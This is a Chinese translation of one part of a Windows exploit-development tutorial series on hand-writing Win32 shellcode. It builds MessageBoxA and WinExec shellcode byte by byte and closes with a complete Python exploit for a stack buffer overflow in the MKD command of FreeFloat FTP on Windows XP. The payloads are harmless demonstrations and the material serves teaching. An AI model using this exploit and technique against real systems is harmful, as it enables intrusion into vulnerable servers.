- 第一部分: Introduction to Exploit Development
- 第二部分:Saved Return Pointer Overflows
- 第三部分:Structured Exception Handler (SEH)
- 第四部分:Egg Hunters
- 第五部分:Unicode 0x00410041
- 第六部分:WIN32 shellcode 编写
- 第七部分:返回导向编程(ROP)
- 第八部分:堆喷射第一节【覆写 EIP】
- 第九部分:堆喷射[第二章:UAF]
- 第十部分:内核利用程序之栈溢出
- 第十一部分:内核利用程序之任意位置任意写
- 第十二部分:内核利用程序之空指针引用
- 第十三部分:内核利用程序之未初始化栈变量
- 第十四部分:内核利用程序之整数溢出
- 第十五部分:内核利用程序之 UAF
- 第十六部分:内核利用程序之池溢出
- 第十七部分:内核利用程序之任意位置任意写
- 第十八篇:内核利用程序之 RS2 Bitmap 巫术
- 第十九篇:内核利用程序之 Razer
文章来源于网络收集而来,版权归原创者所有,如有侵权请及时联系!
MessageBoxA
接下来写 MessageBoxA shellcode, 先看看这个函数的参数。
MessageBoxA:MSDN Structure: Parameters: int WINAPI MessageBox( => user32.dll 的 MessageBoxA 地址 __in_opt HWND hWnd, => 0x00000000 (NULL = No Window Owner) __in_opt LPCTSTR lpText, => 指向"Pop the box!" __in_opt LPCTSTR lpCaption, => 指向"b33f" __in UINT uType => 0x00000000 (MB_OK|MB_APPLMODAL)
看起来有点复杂,但是没有什么不能解决的. 和前面不同的是这里有两个 ASCII 字符串需要处理。
先用 arwin 在 user32.dll 找到 MessageBoxA 的地址
arwin.exe user32.dll MessageBoxA
好的,像之前一样布置字符串如下.:
ASCII Text: ASCII Text:
b33f Pop the box!
Split Text into groups of 4 characters: Split Text into groups of 4 characters:
"b33f" "Pop "
"the "
"box!"
Reverse the order of the character groups: Reverse the order of the character groups:
"b33f" "box!"
"the "
"Pop "
Look on google for a ASCII to hex converter Look on google for a ASCII to hex converter
and convert each character while maintaining and convert each character while maintaining
the order: the order:
"\x62\x33\x33\x66" "\x62\x6F\x78\x21"
"\x74\x68\x65\x20"
"\x50\x6F\x70\x20"
To write these values to the stack simply add To write these values to the stack simply add
"\x68" infront of each group: "\x68" infront of each group:
"\x68\x62\x33\x33\x66" => PUSH "b33f" "\x68\x62\x6F\x78\x21" => PUSH "box!"
"\x68\x74\x68\x65\x20" => PUSH "the "
"\x68\x50\x6F\x70\x20" => PUSH "Pop "
还有两个参数:hWnd 和 uType. 这两个参数都设置为 0x00000000 就好了,很方便,通过异或一个寄存器就可以. 反正我们之前也是要异或寄存器得到\x00 作为 ASCII 字符串结束符。
这是我写的 shellcode(当然,你可以写你自己的
正确的方法: "\x33\xc0" => XOR EAX,EAX | Zero out EAX register "\x50" => PUSH EAX | Push EAX to have null-byte padding for "b33f" "\x68\x62\x33\x33\x66" => PUSH "b33f" | Push The ASCII string to the stack "\x8B\xCC" => MOV ECX,ESP | Put a pointer to lpCaption string in ECX "\x50" => PUSH EAX | Push EAX to have null-byte padding for "Pop the box!" "\x68\x62\x6F\x78\x21" => PUSH "box!" \ "\x68\x74\x68\x65\x20" => PUSH "the " | Push The ASCII string to the stack "\x68\x50\x6F\x70\x20" => PUSH "Pop " / "\x8B\xD4" => MOV EDX,ESP | Put a pointer to lpText string in EDX "\x50" => PUSH EAX | Push uType=0x00000000 "\x51" => PUSH ECX | Push lpCaption "\x52" => PUSH EDX | Push lpText "\x50" => PUSH EAX | Push hWnd=0x00000000 "\xBE\xEA\x07\x45\x7E" => MOV ESI,7E4507EA | Move the pointer to MessageBoxA() into ESI "\xFF\xD6" => CALL ESI | Call MessageBoxA() )
看下面的截图,参数显示正确,继续运行将会弹出 一个消息框。
#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Exploit: FreeFloat FTP (MKD BOF) #
# OS: WinXP PRO SP3 #
# Author: b33f (Ruben Boonen) #
# Software: http://www.freefloat.com/software/freefloatftpserver.zip #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 6 of my Exploit Development tutorial #
# series - http://www.fuzzysecurity.com/tutorials/expDev/6.html #
#----------------------------------------------------------------------------------#
import socket
import sys
#----------------------------------------------------------------------------------#
# (*) WinExec #
# (*) arwin.exe => Kernel32.dll - WinExec 0x7C862AED #
# (*) MSDN Structure: #
# #
# UINT WINAPI WinExec( => PTR to WinExec #
# __in LPCSTR lpCmdLine, => calc.exe #
# __in UINT uCmdShow => 0x1 #
# ); #
# #
# Final Size => 26-bytes (metasploit version size => 227-bytes) #
#----------------------------------------------------------------------------------#
WinExec = (
"\x33\xc0" # XOR EAX,EAX
"\x50" # PUSH EAX => padding for lpCmdLine
"\x68\x2E\x65\x78\x65" # PUSH ".exe"
"\x68\x63\x61\x6C\x63" # PUSH "calc"
"\x8B\xC4" # MOV EAX,ESP
"\x6A\x01" # PUSH 1
"\x50" # PUSH EAX
"\xBB\xED\x2A\x86\x7C" # MOV EBX,kernel32.WinExec
"\xFF\xD3") # CALL EBX
#----------------------------------------------------------------------------------#
# (*) MessageBoxA #
# (*) arwin.exe => user32.dll - MessageBoxA 0x7E4507EA #
# (*) MSDN Structure: #
# #
# int WINAPI MessageBox( => PTR to MessageBoxA #
# __in_opt HWND hWnd, => 0x0 #
# __in_opt LPCTSTR lpText, => Pop the box! #
# __in_opt LPCTSTR lpCaption, => b33f #
# __in UINT uType => 0x0 #
# ); #
# #
# Final Size => 39-bytes (metasploit version size => 287-bytes) #
#----------------------------------------------------------------------------------#
MessageBoxA = (
"\x33\xc0" # XOR EAX,EAX
"\x50" # PUSH EAX => padding for lpCaption
"\x68\x62\x33\x33\x66" # PUSH "b33f"
"\x8B\xCC" # MOV ECX,ESP => PTR to lpCaption
"\x50" # PUSH EAX => padding for lpText
"\x68\x62\x6F\x78\x21" # PUSH "box!"
"\x68\x74\x68\x65\x20" # PUSH "the "
"\x68\x50\x6F\x70\x20" # PUSH "Pop "
"\x8B\xD4" # MOV EDX,ESP => PTR to lpText
"\x50" # PUSH EAX - uType=0x0
"\x51" # PUSH ECX - lpCaption
"\x52" # PUSH EDX - lpText
"\x50" # PUSH EAX - hWnd=0x0
"\xBE\xEA\x07\x45\x7E" # MOV ESI,USER32.MessageBoxA
"\xFF\xD6") # CALL ESI
#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D #
# 0x77c35459 : push esp # ret | msvcrt.dll #
# shellcode at ESP => space 749-bytes #
#----------------------------------------------------------------------------------#
buffer = "\x90"*20 + MessageBoxA
evil = "A"*247 + "\x59\x54\xC3\x77" + buffer + "C"*(749-len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论